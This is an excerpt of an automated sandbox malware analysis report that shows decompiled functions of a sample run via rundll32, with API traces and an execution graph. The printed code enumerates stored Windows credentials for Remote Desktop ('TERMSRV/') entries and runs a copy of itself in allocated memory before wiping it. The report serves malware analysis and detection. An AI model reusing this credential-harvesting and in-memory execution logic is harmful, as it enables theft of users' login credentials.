    • memcpy.MSVCRT ref: 011E2A42
    • memcpy.MSVCRT ref: 011E2AD5
      • Part of subcall function 011E2466: htons.WS2_32(-000000FC), ref: 011E247E
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
    Strings
    • u)u)uDuGuFu[uDuGu[uFuDu[uGu)u<u%u6uQuuuJJJJJu, xrefs: 011E29EE
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E9590, Relevance: 6.1, APIs: 4, Instructions: 89
    C-Code - Quality: 85%
    			E011E9590(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				void* __esi;
				void* _t14;
				void* _t19;
				void* _t22;
				void* _t31;
				long _t35;
				void* _t40;
				intOrPtr _t42;
				int _t44;
				void* _t47;
				long _t48;
				intOrPtr _t51;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t51 =  *0x11ff114; // 0x1
				if(_t51 != 0) {
					L15:
					return 0;
				}
				_t52 =  *0x11ff0fc; // 0x2f1c10
				if(_t52 == 0) {
					goto L15;
				}
				_t14 =  *0x11ff120; // 0x11e0000
				_t1 = _t14 + 0x3c; // 0xf0
				_t44 =  *( *_t1 + _t14 + 0x50);
				_t40 = _t14;
				_v8 = _t44;
				_t31 = VirtualAlloc(0, _t44, 0x1000, 4);
				if(_t31 == 0) {
					L14:
					goto L15;
				}
				 *0x11ff13c = _t31;
				memcpy(_t31, _t40, _t44);
				_t42 =  *0x11ff0fc; // 0x2f1c10
				_t5 = _t42 + 0x3c; // 0xf0
				_t47 =  *_t5 + _t42;
				if(_t47 != 0) {
					_t21 =  *((intOrPtr*)(_t47 + 0xa0));
					if( *((intOrPtr*)(_t47 + 0xa0)) != 0 &&  *((intOrPtr*)(_t47 + 0xa4)) != 0) {
						_t22 = E011E9322(_t47, _t21);
						_t23 = _t22 + _t42;
						if(_t22 + _t42 != 0 && E011E91FA(_t23, _t31) != 0 && E011E9286(_t47, _t31) != 0) {
							_push(0xffffffff);
							_push(_a12);
							_push(_a8);
							_push(_a4);
							 *((intOrPtr*)(E011E94A5 -  *0x11ff120 + _t31))();
						}
					}
				}
				_t48 = _v8;
				if(VirtualProtect(_t31, _t48, 4,  &_v12) == 0) {
					goto L14;
				}
				_t35 = _t48;
				_t19 = _t31;
				if(_t48 == 0) {
					L13:
					VirtualFree(_t31, _t48, 0x4000);
					goto L14;
				} else {
					goto L12;
				}
				do {
					L12:
					 *_t19 = 0;
					_t19 = _t19 + 1;
					_t35 = _t35 - 1;
				} while (_t35 != 0);
				goto L13;
			}


















    0x011e9593
    0x011e9594
    0x011e9597
    0x011e959d
    0x011e967d
    0x011e9680
    0x011e9680
    0x011e95a3
    0x011e95a9
    0x00000000
    0x00000000
    0x011e95af
    0x011e95b4
    0x011e95b9
    0x011e95c7
    0x011e95c9
    0x011e95d2
    0x011e95d6
    0x011e967a
    0x00000000
    0x011e967c
    0x011e95df
    0x011e95e5
    0x011e95ea
    0x011e95f0
    0x011e95f6
    0x011e95f8
    0x011e95fa
    0x011e9602
    0x011e9610
    0x011e9615
    0x011e9617
    0x011e962f
    0x011e9631
    0x011e9639
    0x011e9642
    0x011e9647
    0x011e9647
    0x011e9617
    0x011e9602
    0x011e9649
    0x011e965c
    0x00000000
    0x00000000
    0x011e965e
    0x011e9660
    0x011e9664
    0x011e966d
    0x011e9674
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e9666
    0x011e9666
    0x011e9666
    0x011e9669
    0x011e966a
    0x011e966a
    0x00000000

    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,011E7E14,?,?,?), ref: 011E95CC
    • memcpy.MSVCRT ref: 011E95E5
    • VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 011E9654
    • VirtualFree.KERNEL32(00000000,?,00004000), ref: 011E9674
      • Part of subcall function 011E9286: VirtualProtect.KERNEL32(?,?,00000002,?,00000000), ref: 011E92A3
      • Part of subcall function 011E9286: VirtualProtect.KERNEL32(00000000,?,00000002,?,002F1C10), ref: 011E9301
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E7B31, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84
    C-Code - Quality: 35%
    			E011E7B31(intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				void* __esi;
				char* _t30;
				signed int _t32;
				intOrPtr _t33;
				signed int _t38;
				signed short* _t41;
				void* _t44;
				char* _t45;
				signed short* _t49;

				_t38 = 0;
				_t30 =  &_v8;
				_v12 = 0;
				_v8 = 0;
				__imp__CredEnumerateW(0, 0, _t30,  &_v12);
				_v24 = _t30;
				if(_t30 == 0) {
					L19:
					return _v24;
				}
				_t32 = 0;
				_v20 = 0;
				if(_v8 <= 0) {
					L18:
					__imp__CredFree(_v12);
					goto L19;
				}
				do {
					_t33 =  *((intOrPtr*)(_v12 + _t32 * 4));
					_t49 =  *(_t33 + 8);
					if(_t49 == _t38) {
						L14:
						if( *((intOrPtr*)(_t33 + 4)) != 2) {
							goto L16;
						}
						L15:
						E011E6FC7(_t49, 0, _a4);
						goto L16;
					}
					_v16 = 8;
					_t45 = L"TERMSRV/";
					_t41 = _t49;
					while( *_t41 ==  *_t45) {
						_t41 =  &(_t41[1]);
						_t45 =  &(_t45[2]);
						_t13 =  &_v16;
						 *_t13 = _v16 - 1;
						if( *_t13 != 0) {
							continue;
						}
						_t38 = 0;
						_t44 = 0;
						L8:
						if((0 | _t44 == _t38) == _t38) {
							goto L14;
						}
						_t49 =  &(_t49[8]);
						if( *((intOrPtr*)(_t33 + 4)) != 1) {
							goto L14;
						}
						if( *((intOrPtr*)(_t33 + 0x30)) != _t38 &&  *((intOrPtr*)(_t33 + 0x1c)) != _t38) {
							E011E6DE0( *((intOrPtr*)(_t33 + 0x30)),  *((intOrPtr*)(_t33 + 0x1c)), _t38);
						}
						goto L15;
					}
					asm("sbb ecx, ecx");
					_t44 = ( *_t41 & 0xfffe) + 1;
					_t38 = 0;
					goto L8;
					L16:
					_t32 = _v20 + 1;
					_v20 = _t32;
				} while (_t32 < _v8);
				goto L18;
			}

















    0x011e7b3c
    0x011e7b3e
    0x011e7b44
    0x011e7b47
    0x011e7b4a
    0x011e7b50
    0x011e7b55
    0x011e7c08
    0x011e7c0d
    0x011e7c0d
    0x011e7b5b
    0x011e7b5d
    0x011e7b63
    0x011e7bff
    0x011e7c02
    0x00000000
    0x011e7c02
    0x011e7b6b
    0x011e7b71
    0x011e7b73
    0x011e7b78
    0x011e7bdb
    0x011e7bdf
    0x00000000
    0x00000000
    0x011e7be1
    0x011e7be8
    0x00000000
    0x011e7be8
    0x011e7b7a
    0x011e7b81
    0x011e7b86
    0x011e7b88
    0x011e7b90
    0x011e7b93
    0x011e7b96
    0x011e7b96
    0x011e7b99
    0x00000000
    0x00000000
    0x011e7b9b
    0x011e7b9d
    0x011e7b9f
    0x011e7ba8
    0x00000000
    0x00000000
    0x011e7baa
    0x011e7bb1
    0x00000000
    0x00000000
    0x011e7bb6
    0x011e7bc4
    0x011e7bc4
    0x00000000
    0x011e7bb6
    0x011e7bd1
    0x011e7bd6
    0x011e7bd7
    0x00000000
    0x011e7bed
    0x011e7bf0
    0x011e7bf1
    0x011e7bf4
    0x00000000

    APIs
    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?), ref: 011E7B4A
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,00000001), ref: 011E6E15
      • Part of subcall function 011E6DE0: HeapAlloc.KERNEL32(00000000), ref: 011E6E1E
      • Part of subcall function 011E6DE0: memcpy.MSVCRT ref: 011E6E4B
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000008,?), ref: 011E6E6F
      • Part of subcall function 011E6DE0: HeapAlloc.KERNEL32(00000000), ref: 011E6E72
      • Part of subcall function 011E6DE0: memcpy.MSVCRT ref: 011E6EA1
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000000,?,002E6710,?,?), ref: 011E6EC1
      • Part of subcall function 011E6DE0: HeapFree.KERNEL32(00000000), ref: 011E6EC4
      • Part of subcall function 011E6DE0: GetProcessHeap.KERNEL32(00000000,?), ref: 011E6ECB
      • Part of subcall function 011E6DE0: HeapFree.KERNEL32(00000000), ref: 011E6ECE
    • CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 011E7C02
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E7D6F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41
    C-Code - Quality: 100%
    			E011E7D6F(intOrPtr* _a4) {
				short _v1564;
				intOrPtr* _t7;
				intOrPtr _t15;
				void* _t16;
				void* _t17;
				void* _t19;
				void* _t20;

				_t17 = 0;
				_t19 =  *0x11ff0fc - _t17; // 0x2f1c10
				if(_t19 == 0) {
					L8:
					return _t17;
				}
				_t20 =  *0x11ff11c - _t17; // 0x58778
				if(_t20 != 0) {
					_t7 = _a4;
					_t16 = _t7 + 2;
					do {
						_t15 =  *_t7;
						_t7 = _t7 + 2;
					} while (_t15 != 0);
					if(E011E96C7(L"127.0.0.1", _a4, _t7 - _t16 >> 1) != 0) {
						Sleep(0xbb8);
						if(E011E8320( &_v1564) != 0 && PathFileExistsW( &_v1564) != 0) {
							_t17 = 1;
						}
					}
				}
			}










    0x011e7d79
    0x011e7d7b
    0x011e7d81
    0x011e7de1
    0x011e7de5
    0x011e7de5
    0x011e7d83
    0x011e7d89
    0x011e7d8b
    0x011e7d8e
    0x011e7d91
    0x011e7d91
    0x011e7d94
    0x011e7d97
    0x011e7db0
    0x011e7db7
    0x011e7dcb
    0x011e7de0
    0x011e7de0
    0x011e7dcb
    0x011e7db0

    APIs
      • Part of subcall function 011E96C7: PathFindFileNameW.SHLWAPI(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E96F4
      • Part of subcall function 011E96C7: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 011E9735
      • Part of subcall function 011E96C7: inet_addr.WS2_32(?), ref: 011E9742
    • Sleep.KERNEL32(00000BB8,127.0.0.1,?,?,00000114), ref: 011E7DB7
      • Part of subcall function 011E8320: PathFindFileNameW.SHLWAPI(C:\Users\luketaylor\Desktop\abc.dll), ref: 011E832B
      • Part of subcall function 011E8320: PathCombineW.SHLWAPI(011E7DC9,C:\Windows\,00000000), ref: 011E833A
      • Part of subcall function 011E8320: PathFindExtensionW.SHLWAPI(011E7DC9), ref: 011E8347
    • PathFileExistsW.SHLWAPI(?), ref: 011E7DD4
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E6916, Relevance: 5.0, APIs: 4, Instructions: 44
    C-Code - Quality: 100%
    			E011E6916(char* _a4) {
				int _v8;
				short* _v12;
				int _t7;
				short* _t11;
				int _t12;
				short* _t13;

				_t7 = MultiByteToWideChar(0xfde9, 0, _a4, 0xffffffff, 0, 0);
				_v8 = _t7;
				if(_t7 == 0) {
					L3:
					return 0;
				}
				_t11 = HeapAlloc(GetProcessHeap(), 0, _t7 + _t7);
				_v12 = _t11;
				if(_t11 == 0) {
					goto L3;
				}
				_t12 = MultiByteToWideChar(0xfde9, 0, _a4, 0xffffffff, _t11, _v8);
				_t13 = _v12;
				if(_t12 == 0) {
					goto L3;
				}
				return _t13;
			}









    0x011e6935
    0x011e6937
    0x011e693c
    0x011e696a
    0x00000000
    0x011e696a
    0x011e6949
    0x011e694f
    0x011e6954
    0x00000000
    0x00000000
    0x011e6961
    0x011e6965
    0x011e6968
    0x00000000
    0x00000000
    0x011e6970

    APIs
    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,011E91A4,000000FF,00000000,00000000,00000000,00000000,769E2D57,?,011E91A4,00000000), ref: 011E6935
    • GetProcessHeap.KERNEL32(00000000,00000000,?,011E91A4,00000000), ref: 011E6942
    • HeapAlloc.KERNEL32(00000000,?,011E91A4,00000000), ref: 011E6949
    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,011E91A4,000000FF,00000000,00000000,?,011E91A4,00000000), ref: 011E6961
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E6CAA, Relevance: 5.0, APIs: 4, Instructions: 31
    C-Code - Quality: 100%
    			E011E6CAA(void** _a4) {
				void* _t3;
				void* _t4;
				void** _t7;
				void* _t8;

				_t7 = _a4;
				if(_t7 != 0) {
					_t4 =  *_t7;
					if(_t4 != 0) {
						_t4 = HeapFree(GetProcessHeap(), 0, _t4);
					}
					_t8 = _t7[1];
					if(_t8 != 0) {
						_t4 = HeapFree(GetProcessHeap(), 0, _t8);
					}
					return _t4;
				}
				return _t3;
			}







    0x011e6cae
    0x011e6cb3
    0x011e6cb5
    0x011e6cc7
    0x011e6ccf
    0x011e6ccf
    0x011e6cd1
    0x011e6cd6
    0x011e6cde
    0x011e6cde
    0x00000000
    0x011e6ce1
    0x011e6ce4

    APIs
    • GetProcessHeap.KERNEL32(00000000), ref: 011E6CCC
    • HeapFree.KERNEL32(00000000), ref: 011E6CCF
    • GetProcessHeap.KERNEL32(00000000,?), ref: 011E6CDB
    • HeapFree.KERNEL32(00000000), ref: 011E6CDE
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    Function 011E711F, Relevance: 5.0, APIs: 4, Instructions: 31
    C-Code - Quality: 100%
    			E011E711F(signed int _a4, intOrPtr _a8) {
				void* __ebx;
				signed int* _t11;
				void* _t13;

				_t11 = HeapAlloc(GetProcessHeap(), 8, 8);
				if(_t11 != 0) {
					 *_t11 =  *_t11 & 0x00000000;
					_t11[1] = _a4;
					if(E011E7167(_t11, _t13, _a8) == 0) {
						_t11 = 0;
						HeapFree(GetProcessHeap(), 0, 0);
					}
				}
				return _t11;
			}






    0x011e7137
    0x011e713b
    0x011e7143
    0x011e7146
    0x011e7150
    0x011e7153
    0x011e7159
    0x011e7159
    0x011e7150
    0x011e7164

    APIs
    • GetProcessHeap.KERNEL32(00000008,00000008,00000000,76E6C426,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E712E
    • HeapAlloc.KERNEL32(00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7131
      • Part of subcall function 011E7167: EnterCriticalSection.KERNEL32(002E6710,76E6FE8D,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7178
      • Part of subcall function 011E7167: LeaveCriticalSection.KERNEL32(002E6710,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E71B1
      • Part of subcall function 011E7167: Sleep.KERNELBASE(00002710,?,011E714E,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E71C9
    • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,011E6B1A,00000001,011E6C12,00000000,?,76E6C426), ref: 011E7156
    • HeapFree.KERNEL32(00000000,?,011E6B1A), ref: 011E7159
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd

    Analysis Process: F915.tmp PID: 2800 Parent PID: 2724

    Execution Graph

    Execution Coverage:21.2%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:4.1%
    Total number of Nodes:1285
    Total number of Limit Nodes:46

    Graph

    %3 4240 f626a3 FreeLibrary 4241 f63b42 4242 f63b57 4241->4242 4243 f63b51 4241->4243 4246 f63b5c __CxxUnhandledExceptionFilter 4242->4246 4247 f64fa4 4242->4247 4244 f64f7f __amsg_exit 66 API calls 4243->4244 4244->4242 4248 f64e29 __amsg_exit 66 API calls 4247->4248 4249 f64faf 4248->4249 4249->4246 4782 f62dc6 4784 f62dd0 4782->4784 4785 f62e0f 4784->4785 4786 f638f7 4784->4786 4787 f63906 4786->4787 4788 f6396f 4786->4788 4790 f64c83 __wcsicoll 66 API calls 4787->4790 4793 f6391d 4787->4793 4794 f637f4 4788->4794 4791 f63912 4790->4791 4792 f64c31 __wcsicoll 11 API calls 4791->4792 4792->4793 4793->4784 4795 f6376d ___crtLCMapStringA 76 API calls 4794->4795 4796 f63808 4795->4796 4797 f63835 4796->4797 4798 f6380f 4796->4798 4799 f63864 4797->4799 4800 f6383d 4797->4800 4801 f64c83 __wcsicoll 66 API calls 4798->4801 4805 f64a07 78 API calls __wcsicoll 4799->4805 4808 f6381f 4799->4808 4802 f64c83 __wcsicoll 66 API calls 4800->4802 4803 f63814 4801->4803 4804 f63842 4802->4804 4806 f64c31 __wcsicoll 11 API calls 4803->4806 4807 f64c31 __wcsicoll 11 API calls 4804->4807 4805->4799 4806->4808 4807->4808 4808->4793 4809 f64c96 4810 f64cd2 4809->4810 4811 f64ca8 4809->4811 4811->4810 4813 f66cf0 4811->4813 4814 f66cfc __CxxUnhandledExceptionFilter 4813->4814 4815 f64743 __getptd 66 API calls 4814->4815 4817 f66d01 4815->4817 4816 f67bf4 __CxxUnhandledExceptionFilter 68 API calls 4818 f66d23 __CxxUnhandledExceptionFilter 4816->4818 4817->4816 4818->4810 4819 f623b1 4820 f623bc LocalFree 4819->4820 4821 f623c0 4819->4821 4820->4821 4822 f623cd 4821->4822 4823 f623c9 LocalFree 4821->4823 4824 f623de 4822->4824 4825 f623d7 FreeLibrary 4822->4825 4823->4822 4825->4824 4826 f61d27 RtlEqualUnicodeString 4827 f61d48 4826->4827 4828 f6459c TlsAlloc 4239 f64cd8 SetUnhandledExceptionFilter 4829 f67c70 RtlUnwind 4250 f62143 4251 f62176 4250->4251 4266 f62382 4250->4266 4252 f621ab RtlInitUnicodeString 4251->4252 4253 f62184 GetModuleHandleW GetProcAddress 4251->4253 4254 f619ee 33 API calls 4252->4254 4255 f6219e 4253->4255 4256 f621e0 4254->4256 4255->4252 4255->4266 4257 f62231 GetProcAddress 4256->4257 4258 f6226d 4256->4258 4256->4266 4257->4258 4259 f62246 GetProcAddress 4257->4259 4260 f6134e 13 API calls 4258->4260 4258->4266 4259->4258 4261 f6225b 4259->4261 4263 f622c5 4260->4263 4262 f6134e 13 API calls 4261->4262 4262->4258 4264 f62344 GetModuleHandleW GetProcAddress 4263->4264 4263->4266 4265 f62366 GetModuleHandleW GetProcAddress 4264->4265 4265->4266 4830 f65970 4831 f659a9 4830->4831 4832 f6599c 4830->4832 4834 f65f8e setSBUpLow 5 API calls 4831->4834 4833 f65f8e setSBUpLow 5 API calls 4832->4833 4833->4831 4835 f659b9 4834->4835 4836 f65a3c 4835->4836 4837 f65a12 4835->4837 4846 f676e2 RtlUnwind 4835->4846 4837->4836 4838 f65a2c 4837->4838 4839 f65f8e setSBUpLow 5 API calls 4837->4839 4840 f65f8e setSBUpLow 5 API calls 4838->4840 4839->4838 4840->4836 4842 f65a8e 4843 f65ac2 4842->4843 4844 f65f8e setSBUpLow 5 API calls 4842->4844 4845 f65f8e setSBUpLow 5 API calls 4843->4845 4844->4843 4845->4837 4846->4842 4847 f67650 4848 f67662 4847->4848 4850 f67670 @_EH4_CallFilterFunc@8 4847->4850 4849 f65f8e setSBUpLow 5 API calls 4848->4849 4849->4850 3461 f63a0b 3462 f63a17 __CxxUnhandledExceptionFilter 3461->3462 3463 f63a21 HeapSetInformation 3462->3463 3464 f63a2c 3462->3464 3463->3464 3498 f658f2 HeapCreate 3464->3498 3466 f63a7a 3467 f63a85 3466->3467 3583 f639e2 3466->3583 3499 f6488c GetModuleHandleW 3467->3499 3470 f63a8b 3471 f63a96 __RTC_Initialize 3470->3471 3472 f639e2 66 API calls 3470->3472 3524 f65661 GetStartupInfoW 3471->3524 3472->3471 3475 f63ab0 GetCommandLineW 3537 f65609 GetEnvironmentStringsW 3475->3537 3478 f63ac0 3544 f6555b GetModuleFileNameW 3478->3544 3482 f64fb3 __amsg_exit 66 API calls 3484 f63ad5 3482->3484 3550 f65329 3484->3550 3485 f63adb 3487 f64fb3 __amsg_exit 66 API calls 3485->3487 3488 f63ae6 3485->3488 3487->3488 3564 f64d92 3488->3564 3489 f63af9 3570 f620b7 3489->3570 3490 f63aee 3490->3489 3491 f64fb3 __amsg_exit 66 API calls 3490->3491 3491->3489 3494 f63b27 3598 f64f95 3494->3598 3497 f63b2c __CxxUnhandledExceptionFilter 3498->3466 3500 f648a9 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 3499->3500 3501 f648a0 3499->3501 3506 f648f3 TlsAlloc 3500->3506 3616 f645d9 3501->3616 3505 f64941 TlsSetValue 3507 f64a02 3505->3507 3508 f64952 3505->3508 3506->3505 3506->3507 3507->3470 3601 f64d3b 3508->3601 3513 f649fd 3515 f645d9 70 API calls 3513->3515 3514 f6499a DecodePointer 3516 f649af 3514->3516 3515->3507 3516->3513 3610 f661c9 3516->3610 3519 f649cd DecodePointer 3520 f649de 3519->3520 3520->3513 3521 f649e2 3520->3521 3626 f64616 3521->3626 3523 f649ea GetCurrentThreadId 3523->3507 3525 f661c9 __XcptFilter 66 API calls 3524->3525 3527 f6567f 3525->3527 3526 f63aa4 3526->3475 3591 f64fb3 3526->3591 3527->3526 3528 f657f4 3527->3528 3530 f661c9 __XcptFilter 66 API calls 3527->3530 3536 f65774 3527->3536 3529 f6582a GetStdHandle 3528->3529 3531 f6588e SetHandleCount 3528->3531 3532 f6583c GetFileType 3528->3532 3535 f65862 InitializeCriticalSectionAndSpinCount 3528->3535 3529->3528 3530->3527 3531->3526 3532->3528 3533 f657a0 GetFileType 3534 f657ab InitializeCriticalSectionAndSpinCount 3533->3534 3533->3536 3534->3526 3534->3536 3535->3526 3535->3528 3536->3528 3536->3533 3536->3534 3538 f6561a 3537->3538 3540 f6561e 3537->3540 3538->3478 3541 f66184 ___crtLCMapStringA 66 API calls 3540->3541 3543 f65640 3541->3543 3542 f65647 FreeEnvironmentStringsW 3542->3478 3543->3542 3545 f65590 _wparse_cmdline 3544->3545 3546 f63aca 3545->3546 3547 f655cd 3545->3547 3546->3482 3546->3484 3548 f66184 ___crtLCMapStringA 66 API calls 3547->3548 3549 f655d3 _wparse_cmdline 3548->3549 3549->3546 3551 f65341 _wcslen 3550->3551 3555 f65339 3550->3555 3552 f661c9 __XcptFilter 66 API calls 3551->3552 3560 f65365 _wcslen 3552->3560 3553 f653bb 3554 f6614a __freea 66 API calls 3553->3554 3554->3555 3555->3485 3556 f661c9 __XcptFilter 66 API calls 3556->3560 3557 f653e1 3559 f6614a __freea 66 API calls 3557->3559 3558 f67515 __amsg_exit 66 API calls 3558->3560 3559->3555 3560->3553 3560->3555 3560->3556 3560->3557 3560->3558 3561 f653f8 3560->3561 3562 f64bdf __amsg_exit 10 API calls 3561->3562 3563 f65404 3562->3563 3563->3485 3565 f64da0 3564->3565 3867 f670ce 3565->3867 3567 f64dbe __initterm_e 3569 f64ddf 3567->3569 3870 f670b7 3567->3870 3569->3490 3571 f620c0 3570->3571 3572 f620d1 RtlGetNtVersionNumbers RtlAdjustPrivilege 3570->3572 3940 f61fec GetProcessHeap HeapAlloc 3571->3940 3573 f62126 3572->3573 3576 f62104 3572->3576 3577 f6213f 3573->3577 3578 f62138 CloseHandle 3573->3578 3937 f632e4 3576->3937 3577->3494 3580 f64f69 3577->3580 3578->3577 4202 f64e29 3580->4202 3582 f64f7a 3582->3494 3584 f639f0 3583->3584 3585 f639f5 3583->3585 3586 f651a6 __amsg_exit 66 API calls 3584->3586 3587 f64ff7 __amsg_exit 66 API calls 3585->3587 3586->3585 3588 f639fd 3587->3588 3589 f64d11 __amsg_exit 3 API calls 3588->3589 3590 f63a07 3589->3590 3590->3467 3592 f651a6 __amsg_exit 66 API calls 3591->3592 3593 f64fbd 3592->3593 3594 f64ff7 __amsg_exit 66 API calls 3593->3594 3595 f64fc5 3594->3595 4232 f64f7f 3595->4232 3599 f64e29 __amsg_exit 66 API calls 3598->3599 3600 f64fa0 3599->3600 3600->3497 3639 f64593 EncodePointer 3601->3639 3603 f64d43 3640 f66d29 EncodePointer 3603->3640 3605 f64957 EncodePointer EncodePointer EncodePointer EncodePointer 3606 f65f9d 3605->3606 3608 f65fa8 3606->3608 3607 f65fb2 InitializeCriticalSectionAndSpinCount 3607->3608 3609 f64996 3607->3609 3608->3607 3608->3609 3609->3513 3609->3514 3612 f661d2 3610->3612 3613 f649c5 3612->3613 3614 f661f0 Sleep 3612->3614 3641 f679a2 3612->3641 3613->3513 3613->3519 3615 f66205 3614->3615 3615->3612 3615->3613 3617 f645e3 DecodePointer 3616->3617 3618 f645f2 3616->3618 3617->3618 3619 f64603 TlsFree 3618->3619 3620 f64611 3618->3620 3619->3620 3621 f66003 DeleteCriticalSection 3620->3621 3622 f6601b 3620->3622 3623 f6614a __freea 66 API calls 3621->3623 3624 f6602d DeleteCriticalSection 3622->3624 3625 f648a5 3622->3625 3623->3620 3624->3622 3625->3470 3678 f65910 3626->3678 3628 f64622 GetModuleHandleW 3679 f66117 3628->3679 3630 f64660 InterlockedIncrement 3686 f646b8 3630->3686 3633 f66117 ___crtLCMapStringA 64 API calls 3634 f64681 3633->3634 3689 f6425a InterlockedIncrement 3634->3689 3636 f6469f 3701 f646c1 3636->3701 3638 f646ac __CxxUnhandledExceptionFilter 3638->3523 3639->3603 3640->3605 3642 f679ae 3641->3642 3649 f679c9 3641->3649 3643 f679ba 3642->3643 3642->3649 3650 f64c83 3643->3650 3644 f679dc HeapAlloc 3648 f67a03 3644->3648 3644->3649 3648->3612 3649->3644 3649->3648 3653 f66f6c DecodePointer 3649->3653 3655 f646ca GetLastError 3650->3655 3652 f64c88 3652->3612 3654 f66f81 3653->3654 3654->3649 3669 f645a5 TlsGetValue 3655->3669 3658 f64737 SetLastError 3658->3652 3659 f661c9 __XcptFilter 62 API calls 3660 f646f5 3659->3660 3660->3658 3661 f646fd DecodePointer 3660->3661 3662 f64712 3661->3662 3663 f6472e 3662->3663 3664 f64716 3662->3664 3672 f6614a 3663->3672 3665 f64616 __XcptFilter 62 API calls 3664->3665 3667 f6471e GetCurrentThreadId 3665->3667 3667->3658 3668 f64734 3668->3658 3670 f645d5 3669->3670 3671 f645ba DecodePointer TlsSetValue 3669->3671 3670->3658 3670->3659 3671->3670 3673 f66155 HeapFree 3672->3673 3677 f6617e __freea 3672->3677 3674 f6616a 3673->3674 3673->3677 3675 f64c83 __wcsicoll 64 API calls 3674->3675 3676 f66170 GetLastError 3675->3676 3676->3677 3677->3668 3678->3628 3680 f6612c 3679->3680 3681 f6613f EnterCriticalSection 3679->3681 3704 f66055 3680->3704 3681->3630 3683 f66132 